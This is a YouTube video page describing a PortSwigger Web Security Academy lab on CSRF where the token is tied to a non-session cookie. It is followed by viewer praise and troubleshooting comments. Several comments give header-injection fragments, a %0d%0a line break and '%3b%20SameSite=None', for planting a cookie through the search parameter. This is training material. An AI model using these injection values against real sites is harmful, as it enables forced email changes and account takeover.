CSRF - Lab #5 CSRF where token is tied to non-session cookie | Short Version
HTML-код
- Опубликовано: 26 сен 2024
- In this video, we cover Lab #5 in the CSRF module of the Web Security Academy. This lab's email change functionality is vulnerable to CSRF. It uses tokens to try to prevent CSRF attacks, but they aren't fully integrated into the site's session handling system. To solve the lab, we use the exploit server to host an HTML page that uses a CSRF attack to change the viewer's email address.
▬ ✨ Support Me ✨ ▬▬▬▬▬▬▬▬▬▬
Buy my course: academy.ranakh...
▬ 🔗 Links 🔗 ▬▬▬▬▬▬▬▬▬▬
CSRF Lab #5 long video: • CSRF - Lab #5 CSRF whe...
Notes.txt document: github.com/rkh...
CSRF theory video: • Cross-Site Request For...
Web Security Academy RUclips Video Series Release Schedule: docs.google.co...
Web Security Academy: portswigger.ne...
Rana's Twitter account: / rana__khalil
Im 16 years old , you made me love cyber security
Keep it up! best CS youtube channel I've ever seen
Really liked the way you documenting about issue, preparing test scenarios and explaining the exploit. Keep post the multiple videos.
Very good explination of your testing process. Much appreciation. A lot of value here. More so than just showing the answer absent an explanation.
hello Rana, Wow u are such an amazing person.❤
I've leaved my 17 years of life thinking that in this whole world there is no women who knows or cares about cybersecurity but now I've found u, it makes me kind of love u just the way u are😏
Great methodical approach to the lab. Thank You for detailed explanation.
謝謝你,我通過 youtube 的自動翻譯來傾聽你的講述,你的思維體系讓我震撼,記筆記的方式讓我折服
Wow, this is very helpful and made me understand the lab fully, Thanks alot, Rana.
You ma'am, are a great instructor!! Thank you!
😍love ❤️ for ur explained method
love the you explained ,excellent teaching technique .
Hi Mam , love ur Videos from Pakistan
I was getting the invalid csrf error with Chrome browser. I switched to Firefox and it worked. Note that the "View exploit" still gave me a csrf error. But when I "Deliver to victim" it solved the lab. Just make sure your script is similar to the one from Rana's github repository.
Is thee anybody who did not solve this lab like me ? I tried couple of times but not solved. What I did as far; I picked up second user csrfKey and csrf token and replaced with in first user's csrfKey and csrf token, used engahement tool to prepare HTML code but did not work. I am not sre problem with me as I make mistake or lab is corrupted somehow ?
Did you solve this problem? I have a same problem like you.
it did not work for me too...the header injection with didnt work. check your cookies after trying it with your exploit code. You will see, u did not set your csrfKey. Its still the old ones.
@@a.n.678 yeah it did not work for me too, just append samesite=none, then it works
@@sp1460 Server sends already SameSite=None. Thats not the reason, why it worked. Check the cookie correctly.
Sometimes I thought an approach worked, but then it turned out that I tried around so many times and had already saved the "correct" csrfKey and thus didn't realize that the header injection didn't work. Always open a fresh private mode browser to be sure.
One approach that worked for me was to work with . Set the target to _blank, because you still need the original page to submit the document after a sleep. Portswigger accepts this solution
@@a.n.678 If you dont set the samesite in the payload It wont work
Thanks for making this great content, appreciated \o/
that is a good explaination
Excuse me, I have followed all the steps and I managed to add the csrfKey with "/?search" manually in burp, but when I automate it with
Hi man, I tried so many times but this method is not working. Could you review the question and solution?
amazing video
hi and thx for the great explenation but i cant figure out why i cant solve the lab. if i test it with the csrf's tokens from carlos as i was logged in with wiener ....it worked. so the code is correct, but if i try to send that code with fresh csrf tokens from carlos and send it to the victum it doesnt work to solve the lab =/. i tried to be logged in with wieder and without an login and still nope...maybe server/lab issue
what happens when the application only accepts one csrf token per request and yet you have multiple targets?
I Love your videos!!
My exploit works in view exploit part and email changes but when I click on deliver to victim nothing happened.
Im going to be happy if some one help me to solve this problem🙏🏻
I'm unable to successfully modify the cookie with the search parameter
U R the best! ;]
this lab took me so much time because when i login to the other account in the same browser it shows that they have same csrf token value for some reason. but when i logged in in incognito it showed different csrf token for the 2 accounts. is this a bug in browsers?
hello
If it isnt solved try adding this at the end of the csrf-cookie %3b%20SameSite=None
Yes. I couldn't solve that lab and added this attribute and it worked. This attribute is a security mechanism preventing cookies from a site, to be sent to another site. Our site for our exploit is different from the site used by the victim, so we gotta include that attribute.
Waiting for new lactures...
thanks, lady
Not Working anymore :(, even the PoC script in the github isnt work
for those whom this is not working, add this to the end of the search url : %3b%20SameSite=None
This is happening because the site automatically sets SameSite=Lax because this is the new default in Chrome, which prevents cross site CSRF.
At the time of the video, this wasn't a browser default therefore it worked for her.
Am i alone who recieve invalid CSRF token when i test the CSRF html at my browser?
I am getting it too. Were you able to solve it?
@@heyybigdaddy6988 not yet , I switched to CTF currently
i havent understood, why have you written %0d%0a? what that means? how do you know that?
The %0d%0a pair of characters is the signal for the end of a line and beginning of another in URL
Is this exploitation work in real world?
Hello mam,
why we use header injection?iwhy we dont act like previous sections?